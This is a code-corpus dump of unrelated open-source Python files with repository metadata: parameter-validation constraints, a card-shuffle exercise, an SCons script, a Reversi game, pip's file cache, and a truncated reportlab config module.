raise TypeError("Expecting left to be a real number.")
if self.right is not None and not isinstance(self.right, Real):
raise TypeError("Expecting right to be a real number.")
if self.right is not None and self.left is not None and self.right <= self.left:
raise ValueError(
f"right can't be less than left. Got left={self.left} and "
f"right={self.right}"
)
def __contains__(self, val):
if np.isnan(val):
return False
left_cmp = operator.lt if self.closed in ("left", "both") else operator.le
right_cmp = operator.gt if self.closed in ("right", "both") else operator.ge
left = -np.inf if self.left is None else self.left
right = np.inf if self.right is None else self.right
if left_cmp(val, left):
return False
if right_cmp(val, right):
return False
return True
def is_satisfied_by(self, val):
if not isinstance(val, self.type):
return False
return val in self
def __str__(self):
type_str = "an int" if self.type is Integral else "a float"
left_bracket = "[" if self.closed in ("left", "both") else "("
left_bound = "-inf" if self.left is None else self.left
right_bound = "inf" if self.right is None else self.right
right_bracket = "]" if self.closed in ("right", "both") else ")"
# better repr if the bounds were given as integers
if not self.type == Integral and isinstance(self.left, Real):
left_bound = float(left_bound)
if not self.type == Integral and isinstance(self.right, Real):
right_bound = float(right_bound)
return (
f"{type_str} in the range "
f"{left_bracket}{left_bound}, {right_bound}{right_bracket}"
)
class _ArrayLikes(_Constraint):
"""Constraint representing array-likes"""
def is_satisfied_by(self, val):
return _is_arraylike_not_scalar(val)
def __str__(self):
return "an array-like"
class _SparseMatrices(_Constraint):
"""Constraint representing sparse matrices."""
def is_satisfied_by(self, val):
return issparse(val)
def __str__(self):
return "a sparse matrix"
class _Callables(_Constraint):
"""Constraint representing callables."""
def is_satisfied_by(self, val):
return callable(val)
def __str__(self):
return "a callable"
class _RandomStates(_Constraint):
"""Constraint representing random states.
Convenience class for
[Interval(Integral, 0, 2**32 - 1, closed="both"), np.random.RandomState, None]
"""
def __init__(self):
super().__init__()
self._constraints = [
Interval(Integral, 0, 2**32 - 1, closed="both"),
_InstancesOf(np.random.RandomState),
_NoneConstraint(),
]
def is_satisfied_by(self, val):
return any(c.is_satisfied_by(val) for c in self._constraints)
def __str__(self):
return (
f"{', '.join([str(c) for c in self._constraints[:-1]])} or"
f" {self._constraints[-1]}"
)
class _Booleans(_Constraint):
"""Constraint representing boolean likes.
Convenience class for
[bool, np.bool_, Integral (deprecated)]
"""
def __init__(self):
super().__init__()
self._constraints = [
_InstancesOf(bool),
_InstancesOf(np.bool_),
_InstancesOf(Integral),
]
def is_satisfied_by(self, val):
# TODO(1.4) remove support for Integral.
if isinstance(val, Integral) and not isinstance(val, bool):
warnings.warn(
"Passing an int for a boolean parameter is deprecated in version 1.2 "
"and won't be supported anymore in version 1.4.",
FutureWarning,
)
return any(c.is_satisfied_by(val) for c in self._constraints)
def __str__(self):
return (
f"{', '.join([str(c) for c in self._constraints[:-1]])} or"
f" {self._constraints[-1]}"
)
class _VerboseHelper(_Constraint):
"""Helper constraint for the verbose parameter.
Convenience class for
[Interval(Integral, 0, None, closed="left"), bool, numpy.bool_]
"""
def __init__(self):
super().__init__()
self._constraints = [
Interval(Integral, 0, None, closed="left"),
_InstancesOf(bool),
_InstancesOf(np.bool_),
]
def is_satisfied_by(self, val):
return any(c.is_satisfied_by(val) for c in self._constraints)
def __str__(self):
return (
f"{', '.join([str(c) for c in self._constraints[:-1]])} or"
f" {self._constraints[-1]}"
)
class _MissingValues(_Constraint):
"""Helper constraint for the `missing_values` parameters.
Convenience for
[
Integral,
Interval(Real, None, None, closed="both"),
str,
None,
_NanConstraint(),
_PandasNAConstraint(),
]
"""
def __init__(self):
super().__init__()
self._constraints = [
_InstancesOf(Integral),
# we use an interval of Real to ignore np.nan that has its own constraint
Interval(Real, None, None, closed="both"),
_InstancesOf(str),
_NoneConstraint(),
_NanConstraint(),
_PandasNAConstraint(),
]
def is_satisfied_by(self, val):
return any(c.is_satisfied_by(val) for c in self._constraints)
def __str__(self):
return (
f"{', '.join([str(c) for c in self._constraints[:-1]])} or"
f" {self._constraints[-1]}"
)
class HasMethods(_Constraint):
"""Constraint representing objects that expose specific methods.
It is useful for parameters following a protocol and where we don't want to impose
an affiliation to a specific module or class.
Parameters
----------
methods : str or list of str
The method(s) that the object is expected to expose.
"""
@validate_params({"methods": [str, list]})
def __init__(self, methods):
super().__init__()
if isinstance(methods, str):
methods = [methods]
self.methods = methods
def is_satisfied_by(self, val):
return all(callable(getattr(val, method, None)) for method in self.methods)
def __str__(self):
if len(self.methods) == 1:
methods = f"{self.methods[0]!r}"
else:
methods = (
f"{', '.join([repr(m) for m in self.methods[:-1]])} and"
f" {self.methods[-1]!r}"
)
return f"an object implementing {methods}"
class _IterablesNotString(_Constraint):
"""Constraint representing iterables that are not strings."""
def is_satisfied_by(self, val):
return isinstance(val, Iterable) and not isinstance(val, str)
def __str__(self):
return "an iterable"
class _CVObjects(_Constraint):
"""Constraint representing cv objects.
Convenient class for
[
Interval(Integral, 2, None, closed="left"),
HasMethods(["split", "get_n_splits"]),
_IterablesNotString(),
None,
]
"""
def __init__(self):
super().__init__()
self._constraints = [
Interval(Integral, 2, None, closed="left"),
HasMethods(["split", "get_n_splits"]),
_IterablesNotString(),
_NoneConstraint(),
]
def is_satisfied_by(self, val):
return any(c.is_satisfied_by(val) for c in self._constraints)
def __str__(self):
return (
f"{', '.join([str(c) for c in self._constraints[:-1]])} or"
f" {self._constraints[-1]}"
)
class Hidden:
"""Class encapsulating a constraint not meant to be exposed to the user.
Parameters
----------
constraint : str or _Constraint instance
The constraint to be used internally.
"""
def __init__(self, constraint):
self.constraint = constraint
def generate_invalid_param_val(constraint):
"""Return a value that does not satisfy the constraint.
Raises a NotImplementedError if there exists no invalid value for this constraint.
This is only useful for testing purpose.
Parameters
----------
constraint : _Constraint instance
The constraint to generate a value for.
Returns
-------
val : object
A value that does not satisfy the constraint.
"""
if isinstance(constraint, StrOptions):
return f"not {' or '.join(constraint.options)}"
if isinstance(constraint, _MissingValues):
return np.array([1, 2, 3])
if isinstance(constraint, _VerboseHelper):
return -1
if isinstance(constraint, HasMethods):
return type("HasNotMethods", (), {})()
if isinstance(constraint, _IterablesNotString):
return "a string"
if isinstance(constraint, _CVObjects):
return "not a cv object"
if isinstance(constraint, Interval) and constraint.type is Integral:
if constraint.left is not None:
return constraint.left - 1
if constraint.right is not None:
return constraint.right + 1
# There's no integer outside (-inf, +inf)
raise NotImplementedError
if isinstance(constraint, Interval) and constraint.type in (Real, RealNotInt):
if constraint.left is not None:
return constraint.left - 1e-6
if constraint.right is not None:
return constraint.right + 1e-6
# bounds are -inf, +inf
if constraint.closed in ("right", "neither"):
return -np.inf
if constraint.closed in ("left", "neither"):
return np.inf
# interval is [-inf, +inf]
return np.nan
raise NotImplementedError
def generate_valid_param(constraint):
"""Return a value that does satisfy a constraint.
This is only useful for testing purpose.
Parameters
----------
constraint : Constraint instance
The constraint to generate a value for.
Returns
-------
val : object
A value that does satisfy the constraint.
"""
if isinstance(constraint, _ArrayLikes):
return np.array([1, 2, 3])
if isinstance(constraint, _SparseMatrices):
return csr_matrix([[0, 1], [1, 0]])
if isinstance(constraint, _RandomStates):
return np.random.RandomState(42)
if isinstance(constraint, _Callables):
return lambda x: x
if isinstance(constraint, _NoneConstraint):
return None
if isinstance(constraint, _InstancesOf):
if constraint.type is np.ndarray:
# special case for ndarray since it can't be instantiated without arguments
return np.array([1, 2, 3])
if constraint.type in (Integral, Real):
# special case for Integral and Real since they are abstract classes
return 1
return constraint.type()
if isinstance(constraint, _Booleans):
return True
if isinstance(constraint, _VerboseHelper):
return 1
if isinstance(constraint, _MissingValues):
return np.nan
if isinstance(constraint, HasMethods):
return type(
"ValidHasMethods", (), {m: lambda self: None for m in constraint.methods}
)()
if isinstance(constraint, _IterablesNotString):
return [1, 2, 3]
if isinstance(constraint, _CVObjects):
return 5
if isinstance(constraint, Options): # includes StrOptions
for option in constraint.options:
return option
if isinstance(constraint, Interval):
interval = constraint
if interval.left is None and interval.right is None:
return 0
elif interval.left is None:
return interval.right - 1
elif interval.right is None:
return interval.left + 1
else:
if interval.type is Real:
return (interval.left + interval.right) / 2
else:
return interval.left + 1
raise ValueError(f"Unknown constraint type: {constraint}")
|
[
"[email protected]"
] | |
805e778f090eb8a26dac37e6725197e259091f56
|
f0d713996eb095bcdc701f3fab0a8110b8541cbb
|
/KLke67efuam6ajLrt_2.py
|
1dc365bb23d969b5f0f0d4e85f8e8ff90a1cf504
|
[] |
no_license
|
daniel-reich/turbo-robot
|
feda6c0523bb83ab8954b6d06302bfec5b16ebdf
|
a7a25c63097674c0a81675eed7e6b763785f1c41
|
refs/heads/main
| 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,765 |
py
|
"""
An **out-shuffle** , also known as an _out faro shuffle_ or a _perfect
shuffle_ , is a controlled method for shuffling playing cards. It is performed
by splitting the deck into two equal halves and interleaving them together
perfectly, with the condition that the top card of the deck remains in place.
Using an array to represent a deck of cards, an out-shuffle looks like:
[1, 2, 3, 4, 5, 6, 7, 8] ➞ [1, 5, 2, 6, 3, 7, 4, 8]
// Card 1 remains in the first position.
If we repeat the process, the deck eventually returns to original order.
Shuffle 1:
[1, 2, 3, 4, 5, 6, 7, 8] ➞ [1, 5, 2, 6, 3, 7, 4, 8]
Shuffle 2:
[1, 5, 2, 6, 3, 7, 4, 8] ➞ [1, 3, 5, 7, 2, 4, 6, 8]
Shuffle 3:
[1, 3, 5, 7, 2, 4, 6, 8] ➞ [1, 2, 3, 4, 5, 6, 7, 8]
// Back where we started.
Write a function that takes a positive even integer representing the number of
the cards in a deck, and returns the number of out-shuffles required to return
the deck to its original order.
### Examples
shuffle_count(8) ➞ 3
shuffle_count(14) ➞ 12
shuffle_count(52) ➞ 8
### Notes
* The number of cards is always **even** and **greater than one**. Thus, the smallest possible deck size is **two**.
* A **recursive** version of this challenge can be found via this [link](https://edabit.com/challenge/EXNAxFGgDDtE3SbQf).
"""
def shuffle_count(num):
half = num // 2
deck = list(range(num))
left, right = deck[:half], deck[half:]
deck_s = [right[i // 2] if i % 2 else left[i // 2] for i in range(num)]
count = 1
while deck_s != deck:
left, right = deck_s[:half], deck_s[half:]
deck_s = [right[i // 2] if i % 2 else left[i // 2] for i in range(num)]
count += 1
return count
|
[
"[email protected]"
] | |
8e7ea66678d6525ed22d3dd5952486d8e44cd520
|
6923f79f1eaaba0ab28b25337ba6cb56be97d32d
|
/Fluid_Engine_Development_Doyub_Kim/external/src/pystring/SConscript
|
b6e8c9660762838555a40f518621f6873e7cf39a
|
[
"MIT"
] |
permissive
|
burakbayramli/books
|
9fe7ba0cabf06e113eb125d62fe16d4946f4a4f0
|
5e9a0e03aa7ddf5e5ddf89943ccc68d94b539e95
|
refs/heads/master
| 2023-08-17T05:31:08.885134 | 2023-08-14T10:05:37 | 2023-08-14T10:05:37 | 72,460,321 | 223 | 174 | null | 2022-10-24T12:15:06 | 2016-10-31T17:24:00 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 320 |
"""
Copyright (c) 2016 Doyub Kim
"""
Import('env', 'os', 'utils')
script_dir = os.path.dirname(File('SConscript').rfile().abspath)
lib_env = env.Clone()
lib_env.Append(CPPPATH = [os.path.join(script_dir, 'pystring'), script_dir])
lib = lib_env.Library('pystring', 'pystring/pystring.cpp')
Return('lib_env', 'lib')
|
[
"[email protected]"
] | ||
83f402a7ec1b6a4bf2e2ac6f13ff695c108fcf0c
|
44ff565bb1838a445e0d5a89ea3ca3e4b29b3686
|
/Python算法详解/第12章/Reversi.py
|
0a81667472893c1c0099a99a2e84e5b90021e743
|
[] |
no_license
|
huoweikong/python_pch_kiton
|
df3162aae397e82df9ef575f5f9d26039e5e036e
|
057cef1f34c76701840e7b8b46a5955b9f38b86b
|
refs/heads/master
| 2023-01-10T22:40:45.610986 | 2020-11-19T18:37:56 | 2020-11-19T18:37:56 | 313,897,428 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 9,262 |
py
|
# Reversegam: a clone of Othello/Reversi
import random
import sys
WIDTH = 8 # Board is 8 spaces wide
HEIGHT = 8 # Board is 8 spaces tall
def drawBoard(board):
# This function prints the board that it was passed. Returns None.
print(' 12345678')
print(' +--------+')
for y in range(HEIGHT):
print('%s|' % (y+1), end='')
for x in range(WIDTH):
print(board[x][y], end='')
print('|%s' % (y+1))
print(' +--------+')
print(' 12345678')
def getNewBoard():
# Creates a brand-new, blank board data structure.
board = []
for i in range(WIDTH):
board.append([' ', ' ', ' ', ' ', ' ', ' ', ' ', ' '])
return board
def isValidMove(board, tile, xstart, ystart):
# 如果玩家在空间x上移动,则y无效,则返回false。 如果它是一个有效的移动,
# 则返回一个空格列表,如果玩家在这里移动的话,它们会变成玩家的列表。
if board[xstart][ystart] != ' ' or not isOnBoard(xstart, ystart):
return False
if tile == 'X':
otherTile = 'O'
else:
otherTile = 'X'
tilesToFlip = []
for xdirection, ydirection in [[0, 1], [1, 1], [1, 0], [1, -1], [0, -1], [-1, -1], [-1, 0], [-1, 1]]:
x, y = xstart, ystart
x += xdirection # First step in the x direction
y += ydirection # First step in the y direction
while isOnBoard(x, y) and board[x][y] == otherTile:
# 继续在这个XY方向前进 .
x += xdirection
y += ydirection
if isOnBoard(x, y) and board[x][y] == tile:
# 有一些东西翻转过来。沿着相反的方向走,直到我们到达原始空间,注意沿途所有的瓦片。
while True:
x -= xdirection
y -= ydirection
if x == xstart and y == ystart:
break
tilesToFlip.append([x, y])
if len(tilesToFlip) == 0: # 如果没有翻转瓦片,这不是有效的移动。.
return False
return tilesToFlip
def isOnBoard(x, y):
# 如果坐标位于板上,则返回true .
return x >= 0 and x <= WIDTH - 1 and y >= 0 and y <= HEIGHT - 1
def getBoardWithValidMoves(board, tile):
# 返回一个新的棋盘,标明玩家可以做出的有效动作。
boardCopy = getBoardCopy(board)
for x, y in getValidMoves(boardCopy, tile):
boardCopy[x][y] = '.'
return boardCopy
def getValidMoves(board, tile):
# 返回给定板上给定玩家的有效移动列表[x,y]
validMoves = []
for x in range(WIDTH):
for y in range(HEIGHT):
if isValidMove(board, tile, x, y) != False:
validMoves.append([x, y])
return validMoves
def getScoreOfBoard(board):
# 通过计算瓦片来确定分数。返回带有键x’和‘o’的字典。
xscore = 0
oscore = 0
for x in range(WIDTH):
for y in range(HEIGHT):
if board[x][y] == 'X':
xscore += 1
if board[x][y] == 'O':
oscore += 1
return {'X':xscore, 'O':oscore}
def enterPlayerTile():
# 让玩家键入他们想要的瓦片
# 返回一个列表,玩家的瓦片作为第一个项目,计算机的瓦片作为第二个.
tile = ''
while not (tile == 'X' or tile == 'O'):
print('Do you want to be X or O?')
tile = input().upper()
# The first element in the list is the player's tile, and the second is the computer's tile.
if tile == 'X':
return ['X', 'O']
else:
return ['O', 'X']
def whoGoesFirst():
# Randomly choose who goes first.
if random.randint(0, 1) == 0:
return 'computer'
else:
return 'player'
def makeMove(board, tile, xstart, ystart):
# Place the tile on the board at xstart, ystart, and flip any of the opponent's pieces.
# Returns False if this is an invalid move; True if it is valid.
tilesToFlip = isValidMove(board, tile, xstart, ystart)
if tilesToFlip == False:
return False
board[xstart][ystart] = tile
for x, y in tilesToFlip:
board[x][y] = tile
return True
def getBoardCopy(board):
# Make a duplicate of the board list and return it.
boardCopy = getNewBoard()
for x in range(WIDTH):
for y in range(HEIGHT):
boardCopy[x][y] = board[x][y]
return boardCopy
def isOnCorner(x, y):
# Returns True if the position is in one of the four corners.
return (x == 0 or x == WIDTH - 1) and (y == 0 or y == HEIGHT - 1)
def getPlayerMove(board, playerTile):
# Let the player enter their move.
# Returns the move as [x, y] (or returns the strings 'hints' or 'quit').
DIGITS1TO8 = '1 2 3 4 5 6 7 8'.split()
while True:
print('Enter your move, "quit" to end the game, or "hints" to toggle hints.')
move = input().lower()
if move == 'quit' or move == 'hints':
return move
if len(move) == 2 and move[0] in DIGITS1TO8 and move[1] in DIGITS1TO8:
x = int(move[0]) - 1
y = int(move[1]) - 1
if isValidMove(board, playerTile, x, y) == False:
continue
else:
break
else:
print('That is not a valid move. Enter the column (1-8) and then the row (1-8).')
print('For example, 81 will move on the top-right corner.')
return [x, y]
def getComputerMove(board, computerTile):
# Given a board and the computer's tile, determine where to
# move and return that move as a [x, y] list.
possibleMoves = getValidMoves(board, computerTile)
random.shuffle(possibleMoves) # randomize the order of the moves
# Always go for a corner if available.
for x, y in possibleMoves:
if isOnCorner(x, y):
return [x, y]
# Find the highest-scoring move possible.
bestScore = -1
for x, y in possibleMoves:
boardCopy = getBoardCopy(board)
makeMove(boardCopy, computerTile, x, y)
score = getScoreOfBoard(boardCopy)[computerTile]
if score > bestScore:
bestMove = [x, y]
bestScore = score
return bestMove
def printScore(board, playerTile, computerTile):
scores = getScoreOfBoard(board)
print('You: %s points. Computer: %s points.' % (scores[playerTile], scores[computerTile]))
def playGame(playerTile, computerTile):
showHints = False
turn = whoGoesFirst()
print('The ' + turn + ' will go first.')
# Clear the board and place starting pieces.
board = getNewBoard()
board[3][3] = 'X'
board[3][4] = 'O'
board[4][3] = 'O'
board[4][4] = 'X'
while True:
playerValidMoves = getValidMoves(board, playerTile)
computerValidMoves = getValidMoves(board, computerTile)
if playerValidMoves == [] and computerValidMoves == []:
return board # No one can move, so end the game.
elif turn == 'player': # Player's turn
if playerValidMoves != []:
if showHints:
validMovesBoard = getBoardWithValidMoves(board, playerTile)
drawBoard(validMovesBoard)
else:
drawBoard(board)
printScore(board, playerTile, computerTile)
move = getPlayerMove(board, playerTile)
if move == 'quit':
print('Thanks for playing!')
sys.exit() # Terminate the program.
elif move == 'hints':
showHints = not showHints
continue
else:
makeMove(board, playerTile, move[0], move[1])
turn = 'computer'
elif turn == 'computer': # Computer's turn
if computerValidMoves != []:
drawBoard(board)
printScore(board, playerTile, computerTile)
input('Press Enter to see the computer\'s move.')
move = getComputerMove(board, computerTile)
makeMove(board, computerTile, move[0], move[1])
turn = 'player'
print('Welcome to Reversegam!')
playerTile, computerTile = enterPlayerTile()
while True:
finalBoard = playGame(playerTile, computerTile)
# Display the final score.
drawBoard(finalBoard)
scores = getScoreOfBoard(finalBoard)
print('X scored %s points. O scored %s points.' % (scores['X'], scores['O']))
if scores[playerTile] > scores[computerTile]:
print('You beat the computer by %s points! Congratulations!' % (scores[playerTile] - scores[computerTile]))
elif scores[playerTile] < scores[computerTile]:
print('You lost. The computer beat you by %s points.' % (scores[computerTile] - scores[playerTile]))
else:
print('The game was a tie!')
print('Do you want to play again? (yes or no)')
if not input().lower().startswith('y'):
break
|
[
"[email protected]"
] | |
1d443fcd8a68dc9c0124dcbff16c16d020b695ab
|
9e549ee54faa8b037f90eac8ecb36f853e460e5e
|
/venv/lib/python3.6/site-packages/pip/_vendor/cachecontrol/caches/file_cache.py
|
10f2f222d46d9d3c3a69f254940903cb2be1c86b
|
[
"MIT"
] |
permissive
|
aitoehigie/britecore_flask
|
e8df68e71dd0eac980a7de8c0f20b5a5a16979fe
|
eef1873dbe6b2cc21f770bc6dec783007ae4493b
|
refs/heads/master
| 2022-12-09T22:07:45.930238 | 2019-05-15T04:10:37 | 2019-05-15T04:10:37 | 177,354,667 | 0 | 0 |
MIT
| 2022-12-08T04:54:09 | 2019-03-24T00:38:20 |
Python
|
UTF-8
|
Python
| false | false | 4,176 |
py
|
import hashlib
import os
from textwrap import dedent
from ..cache import BaseCache
from ..controller import CacheController
try:
FileNotFoundError
except NameError:
# py2.X
FileNotFoundError = (IOError, OSError)
def _secure_open_write(filename, fmode):
# We only want to write to this file, so open it in write only mode
flags = os.O_WRONLY
# os.O_CREAT | os.O_EXCL will fail if the file already exists, so we only
# will open *new* files.
# We specify this because we want to ensure that the mode we pass is the
# mode of the file.
flags |= os.O_CREAT | os.O_EXCL
# Do not follow symlinks to prevent someone from making a symlink that
# we follow and insecurely open a cache file.
if hasattr(os, "O_NOFOLLOW"):
flags |= os.O_NOFOLLOW
# On Windows we'll mark this file as binary
if hasattr(os, "O_BINARY"):
flags |= os.O_BINARY
# Before we open our file, we want to delete any existing file that is
# there
try:
os.remove(filename)
except (IOError, OSError):
# The file must not exist already, so we can just skip ahead to opening
pass
# Open our file, the use of os.O_CREAT | os.O_EXCL will ensure that if a
# race condition happens between the os.remove and this line, that an
# error will be raised. Because we utilize a lockfile this should only
# happen if someone is attempting to attack us.
fd = os.open(filename, flags, fmode)
try:
return os.fdopen(fd, "wb")
except:
# An error occurred wrapping our FD in a file object
os.close(fd)
raise
class FileCache(BaseCache):
def __init__(
self,
directory,
forever=False,
filemode=0o0600,
dirmode=0o0700,
use_dir_lock=None,
lock_class=None,
):
if use_dir_lock is not None and lock_class is not None:
raise ValueError("Cannot use use_dir_lock and lock_class together")
try:
from pip._vendor.lockfile import LockFile
from pip._vendor.lockfile.mkdirlockfile import MkdirLockFile
except ImportError:
notice = dedent(
"""
NOTE: In order to use the FileCache you must have
lockfile installed. You can install it via pip:
pip install lockfile
"""
)
raise ImportError(notice)
else:
if use_dir_lock:
lock_class = MkdirLockFile
elif lock_class is None:
lock_class = LockFile
self.directory = directory
self.forever = forever
self.filemode = filemode
self.dirmode = dirmode
self.lock_class = lock_class
@staticmethod
def encode(x):
return hashlib.sha224(x.encode()).hexdigest()
def _fn(self, name):
# NOTE: This method should not change as some may depend on it.
# See: https://github.com/ionrock/cachecontrol/issues/63
hashed = self.encode(name)
parts = list(hashed[:5]) + [hashed]
return os.path.join(self.directory, *parts)
def get(self, key):
name = self._fn(key)
try:
with open(name, "rb") as fh:
return fh.read()
except FileNotFoundError:
return None
def set(self, key, value):
name = self._fn(key)
# Make sure the directory exists
try:
os.makedirs(os.path.dirname(name), self.dirmode)
except (IOError, OSError):
pass
with self.lock_class(name) as lock:
# Write our actual file
with _secure_open_write(lock.path, self.filemode) as fh:
fh.write(value)
def delete(self, key):
name = self._fn(key)
if not self.forever:
try:
os.remove(name)
except FileNotFoundError:
pass
def url_to_file_path(url, filecache):
"""Return the file cache path based on the URL.
This does not ensure the file exists!
"""
key = CacheController.cache_url(url)
return filecache._fn(key)
|
[
"[email protected]"
] | |
03e064a0bce0dd00a223a41938dc5d68dd20b8ce
|
6437a3a4a31ab9ad233d6b2d985beb50ed50de23
|
/PythonistaAppTemplate/PythonistaKit.framework/pylib/site-packages/reportlab/rl_config.py
|
14438fb24175d622317b26fc4539590edf37a674
|
[] |
no_license
|
sreyemnayr/jss-lost-mode-app
|
03ddc472decde3c17a11294d8ee48b02f83b71e7
|
3ff4ba6fb13f4f3a4a98bfc824eace137f6aabaa
|
refs/heads/master
| 2021-05-02T08:50:10.580091 | 2018-02-08T20:32:29 | 2018-02-08T20:32:29 | 120,813,623 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 8,725 |
py
|
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
'''module that aggregates config information'''
__all__=('_reset','register_reset')
def _defaults_init():
'''
create & return defaults for all reportlab settings from
reportlab.rl_settings.py
reportlab.local_rl_settings.py
reportlab_settings.py or ~/.reportlab_settings
latter values override earlier
'''
from reportlab.lib.utils import rl_exec
import os
_DEFAULTS={}
rl_exec('from reportlab.rl_settings import *',_DEFAULTS)
_overrides=_DEFAULTS.copy()
try:
rl_exec('from reportlab.local_rl_settings import *',_overrides)
_DEFAULTS.update(_overrides)
except ImportError:
pass
_overrides=_DEFAULTS.copy()
try:
rl_exec('from reportlab_settings import *',_overrides)
_DEFAULTS.update(_overrides)
except ImportError:
_overrides=_DEFAULTS.copy()
try:
with open(os.path.expanduser(os.path.join('~','.reportlab_settings')),'rb') as f:
rl_exec(f.read(),_overrides)
_DEFAULTS.update(_overrides)
except:
pass
return _DEFAULTS
_DEFAULTS=_defaults_init()
_SAVED = {}
sys_version=None
#this is used to set the options from
def _setOpt(name, value, conv=None):
'''set a module level value from environ/default'''
from os import environ
ename = 'RL_'+name
if ename in environ:
value = environ[ename]
if conv: value = conv(value)
globals()[name] = value
def _startUp():
'''This function allows easy resetting to the global defaults
If the environment contains 'RL_xxx' then we use the value
else we use the given default'''
import os, sys
global sys_version, _unset_
sys_version = sys.version.split()[0] #strip off the other garbage
from reportlab.lib import pagesizes
from reportlab.lib.utils import rl_isdir
if _SAVED=={}:
_unset_ = getattr(sys,'_rl_config__unset_',None)
if _unset_ is None:
class _unset_: pass
sys._rl_config__unset_ = _unset_ = _unset_()
global __all__
A = list(__all__)
for k,v in _DEFAULTS.items():
_SAVED[k] = globals()[k] = v
if k not in __all__:
A.append(k)
__all__ = tuple(A)
#places to search for Type 1 Font files
import reportlab
D = {'REPORTLAB_DIR': os.path.abspath(os.path.dirname(reportlab.__file__)),
'CWD': os.getcwd(),
'disk': os.getcwd().split(':')[0],
'sys_version': sys_version,
'XDG_DATA_HOME': os.environ.get('XDG_DATA_HOME','~/.local/share'),
}
for k in _SAVED:
if k.endswith('SearchPath'):
P=[]
for p in _SAVED[k]:
d = (p % D).replace('/',os.sep)
if '~' in d: d = os.path.expanduser(d)
